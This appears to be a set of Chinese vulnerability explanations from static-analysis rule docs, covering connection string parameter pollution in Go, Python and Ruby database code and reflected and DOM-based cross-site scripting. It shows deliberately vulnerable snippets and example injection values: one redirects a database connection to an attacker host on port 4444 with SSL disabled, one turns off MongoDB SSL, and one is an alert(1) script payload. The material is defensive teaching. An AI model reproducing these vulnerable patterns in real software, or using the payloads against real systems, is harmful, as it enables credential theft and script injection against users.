连接字符串参数污染 (CSPP) 攻击包括将连接字符串参数注入到其他现有参数中。这个漏洞类似于也可能会发生参数污染的 HTTP 环境中的漏洞（可能更广为人知）。然而，它可能还适用于其他地方，比如数据库连接字符串。如果应用程序没有正确地检查用户输入，则恶意用户可能会破坏应用程序的逻辑，以执行从窃取凭证到检索整个数据库等各种攻击。如果再向应用程序提交其他参数，且这些参数与现有参数的名称相同，则数据库可能会有下列一种反应：

它可能只从第一个参数中提取数据
它可能从最后一个参数中提取数据
它可能从所有参数中提取数据并将它们连接在一起

这取决于所使用的驱动程序、数据库类型乃至 API 的使用方法。


示例 1：以下代码使用 HTTP 请求中的输入来连接到数据库：

    ...
    password := request.FormValue("db_pass")
    db, err := sql.Open("mysql", "user:" + password + "@/dbname")
    ...

在这个例子中，程序员并没有考虑到攻击者可以提供 db_pass 参数，比如：
"xxx@/attackerdb?foo=" 之后连接字符串变为：

"user:xxx@/attackerdb?foo=/dbname"

这样会让应用程序连接到攻击者控制器数据库，让攻击者能够控制哪些数据要传回应用程序。

连接字符串参数污染 (CSPP) 攻击包括将连接字符串参数注入到其他现有的参数中。 这个漏洞类似于也可能会发生参数污染的 HTTP 环境中的漏洞（可能更广为人知）。 然而，它可能还适用于其他地方，比如数据库连接字符串。 如果应用程序没有正确地检查用户输入，则恶意用户可能会破坏应用程序的逻辑，进行从窃取凭证到检索整个数据库等各种攻击。 在向应用程序提交额外参数时，如果这些参数与现有参数的名称相同，则数据库连接可能会产生下列某种反应：

它可能只从第一个参数中提取数据
它可能从最后一个参数中提取数据
它可能从所有参数中提取数据并将它们连接在一起

这可能取决于所使用的驱动程序、数据库类型乃至 API 的使用方法。

示例 1： 下面的代码使用 HTTP 请求中的输入来连接到数据库：

username = req.field('username')
password = req.field('password')
...
client = MongoClient('mongodb://%s:%s@aMongoDBInstance.com/?ssl=true' % (username, password))
...

在这个例子中，程序员并没有考虑到攻击者可以提供 password 参数，比如：
“myPassword@aMongoDBInstance.com/?ssl=false&”，于是连接字符串变为（假定用户名为“scott”）：

“mongodb://scott:myPassword@aMongoDBInstance.com/?ssl=false&@aMongoDBInstance.com/?ssl=true”

这会导致“@aMongoDBInstance.com/?ssl=true”被视为附加的无效参数，从而有效地忽略“ssl=true”并连接到未加密的数据库。

连接字符串参数污染 (CSPP) 攻击包括将连接字符串参数注入到其他现有的参数中。这个漏洞类似于也可能会发生参数污染的 HTTP 环境中的漏洞（可能更广为人知）。然而，它可能还适用于其他地方，比如数据库连接字符串的。如果应用程序没有正确地检查用户输入，则恶意用户可能会破坏应用程序的逻辑，进行各种攻击，从窃取凭证到检索整个数据库。如果再向应用程序提交参数，并且如果这些参数与现有参数的名称相同，则数据库连接可能会有下列一种反应：

它可能只从第一个参数中提取数据
它可能从最后一个参数中提取数据
它可能从所有参数中提取数据并把它们连接起来

这可能取决于所使用的驱动程序、数据库类型乃至 API 的使用方法。

例 1：下面的代码使用 HTTP 请求中的输入来连接到数据库：

hostname = req.params['host'] #gets POST parameter 'host'
...
conn = PG::Connection.new("connect_timeout=20 dbname=app_development user=#{user} password=#{password} host=#{hostname}")
...

在这个例子中，程序员并没有考虑到攻击者可以提供 host 参数，比如：
“myevilsite.com%20port%3D4444%20sslmode%3Ddisable”，于是连接字符串变为（假定用户名为“scott”，密码为“5up3RS3kR3t”）：

"dbname=app_development user=scott password=5up3RS3kR3t host=myevilsite.com port=4444 sslmode=disable"

这将在端口 4444 上查找“myevilsite.com”并连接至此网站，禁用 SSL。这意味着攻击者可能会窃取“scott”用户的凭证，然后使用此凭证在用户的机器和真正的数据库之间进行中间人攻击，或者只登录到真正的数据库并直接对数据库执行查询。

Cross-Site Scripting (XSS) 漏洞会在以下情况下出现：

1.数据通过一个不可信赖的数据源进入 Web 应用程序。对于 Reflected XSS，不可信赖的数据源通常为 Web 请求，而对于 Persisted（也称为 Stored）XSS，该数据源通常为数据库或其他后端数据存储。


2.未经验证但包含在动态内容中的数据将传送给 Web 用户。

传送到 Web 浏览器的恶意内容通常采用 JavaScript 片段的形式，但也可能会包含一些 HTML、Flash 或者其他任意一种可以被浏览器执行的代码。基于 XSS 的攻击手段花样百出，几乎是无穷无尽的，但通常它们都会包含传输给攻击者的私有数据（如 Cookie 或者其他会话信息）。在攻击者的控制下，指引受害者进入恶意的网络内容；或者利用易受攻击的站点，对用户的机器进行其他恶意操作。

为了让浏览器将响应呈现为 HTML 或者可执行脚本的其他文档，必须指定 text/html MIME 类型。因此，仅当响应使用此 MIME 类型或者使用的任何其他类型同样强制浏览器将响应呈现为 HTML 或可执行 SVG 图像 (image/svg+xml) 和 XML 文档 (application/xml) 等脚本的其他文档时，才有可能使用 XSS。

大多数现代浏览器不会呈现 HTML，也不会在为响应提供 application/json 等 MIME 类型时执行脚本。但是，Internet Explorer 等某些浏览器可执行称为 Content Sniffing 的内容。Content Sniffing 涉及到忽略提供的 MIME 类型并尝试根据响应的内容推断正确的 MIME 类型。
但是，值得注意的是，MIME 类型的 text/html 是可能导致 XSS 漏洞的唯一 MIME 类型。可执行 SVG 图像 (image/svg+xml) 和 XML 文档 (application/xml) 等脚本的其他文档可能导致 XSS 漏洞，无论浏览器是否执行 Content Sniffing 都是如此。

因此，<html><body><script>alert(1)</script></body></html> 等响应可能呈现为 HTML，即使其 content-type 标头设置为 application/json 也是如此。

示例 1：以下 AWS Lambda 函数反映了 application/json 响应中的用户数据。

def mylambda_handler(event, context):
    name = event['name']
    response = {
        "statusCode": 200,
        "body": "{'name': name}",
        "headers": {
            'Content-Type': 'application/json',
        }
    }
    return response

如果攻击者所发送请求的 name 参数设置为 <html><body><script>alert(1)</script></body></html>，则服务器将生成以下响应：

HTTP/1.1 200 OK
Content-Length: 88
Content-Type: application/json
Connection: Closed

{'name': '<html><body><script>alert(1)</script></body></html>'}

尽管响应明确声明应该将其视为 JSON 文档，但旧浏览器仍可能尝试将其呈现为 HTML 文档，使其容易受到 Cross-Site Scripting 攻击。

Cross-Site Scripting (XSS) 漏洞在以下情况下发生：

1. 数据通过一个不可信赖的数据源进入 Web 应用程序。对于基于 DOM 的 XSS，将从 URL 参数或浏览器中的其他值读取数据，并使用客户端代码将其重新写入该页面。对于 Reflected XSS，不可信赖的数据源通常为 Web 请求，而对于 Persisted（也称为 Stored）XSS，该数据源通常为数据库或其他后端数据存储。


2.未经验证但包含在动态内容中的数据将传送给 Web 用户。对于基于 DOM 的 XSS，任何时候当受害人的浏览器解析 HTML 页面时，恶意内容都将作为 DOM（文档对象模型）创建的一部分执行。

传送到 Web 浏览器的恶意内容通常采用 JavaScript 片段的形式，但也可能会包含一些 HTML、Flash 或者其他任意一种可以被浏览器执行的代码。基于 XSS 的攻击手段花样百出，几乎是无穷无尽的，但通常它们都会包含传输给攻击者的私有数据（如 Cookie 或者其他会话信息）。在攻击者的控制下，指引受害者进入恶意的网络内容；或者利用易受攻击的站点，对用户的机器进行其他恶意操作。

例 1：下面的 JavaScript 代码片段可从 URL 中读取雇员 ID eid，并将其显示给用户。

<SCRIPT>
var pos=document.URL.indexOf("eid=")+4;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT>

示例 2：考虑使用 HTML 表单：

  <div id="myDiv">
    Employee ID: <input type="text" id="eid"><br>
    ...
    <button>Show results</button>
  </div>
  <div id="resultsDiv">
    ...
  </div>

下面的 jQuery 代码片段可从表单中读取雇员 ID，并将其显示给用户。

  $(document).ready(function(){
    $("#myDiv").on("click", "button", function(){
      var eid = $("#eid").val();
      $("resultsDiv").append(eid);
      ...
    });
  });

如果文本输入中 ID 为 eid 的雇员 ID 仅包含标准字母数字文本，则这些代码示例可正确运行。如果 eid 中的某个值包含元字符或源代码，则 Web 浏览器就会在显示 HTTP 响应时执行该代码。

示例 3：以下代码显示了 React 应用程序中基于 DOM 的 XSS 示例：

let element = JSON.parse(getUntrustedInput());
ReactDOM.render(<App>
    {element}
</App>);

在Example 3 中，如果攻击者可以控制从 getUntrustedInput() 检索到的整个 JSON 对象，他们可能就能够使 React 将 element 呈现为一个组件，从而可以使用他们自己控制的值传递具有 dangerouslySetInnerHTML 的对象，这是一种典型的 Cross-Site Scripting 攻击。

最初，这些代码看起来似乎不会轻易遭受攻击。毕竟，有谁会输入包含可在自己电脑上运行的恶意代码的内容呢？真正的危险在于攻击者会创建恶意的 URL，然后采用电子邮件或社交工程的欺骗手段诱使受害者访问此 URL 的链接。当受害者单击这个链接时，他们不知不觉地通过易受攻击的网络应用程序，将恶意内容带到了自己的电脑中。这种对易受攻击的 Web 应用程序进行盗取的机制通常被称为反射式 XSS。

正如例子中所显示的，XSS 漏洞是由于 HTTP 响应中包含了未验证的数据代码而引起的。受害者遭受 XSS 攻击的途径有三种：

- 系统从 HTTP 请求中直接读取数据，并在 HTTP 响应中返回数据。当攻击者诱使用户为易受攻击的 Web 应用程序提供危险内容，而这些危险内容随后会反馈给用户并在 Web 浏览器中执行时，就会发生 Reflected XSS 漏洞利用。发送恶意内容最常用的方法是，将恶意内容作为一个参数包含在公开发布或通过电子邮件直接发送给受害者的 URL 中。以这种手段构造的 URL 已成为多种网络钓鱼阴谋的核心，攻击者会借此诱骗受害者访问指向易受攻击站点的 URL。该站点将攻击者的内容反馈给受害者后，便会执行这些内容，接下来会将用户计算机中的各种私密信息（比如可能包含会话信息的 Cookie）传输给攻击者，或者执行其他恶意活动。

— 应用程序将危险数据存储在数据库或其他可信赖的数据存储器中。这些危险数据随后会被回写到应用程序中，并包含在动态内容中。Persistent XSS 盗取发生在如下情况：攻击者将危险内容注入到数据存储器中，且该存储器之后会被读取并包含在动态内容中。从攻击者的角度看，注入恶意内容的最佳位置莫过于一个面向许多用户，尤其是相关用户显示的区域。相关用户通常在应用程序中具备较高的特权，或相互之间交换敏感数据，这些数据对攻击者来说有利用价值。如果某一个用户执行了恶意内容，攻击者就有可能以该用户的名义执行某些需要特权的操作，或者获得该用户个人所有的敏感数据的访问权限。

— 应用程序之外的数据源将危险数据储存在一个数据库或其他数据存储器中，随后这些危险数据被当作可信赖的数据回写到应用程序中，并储存在动态内容中。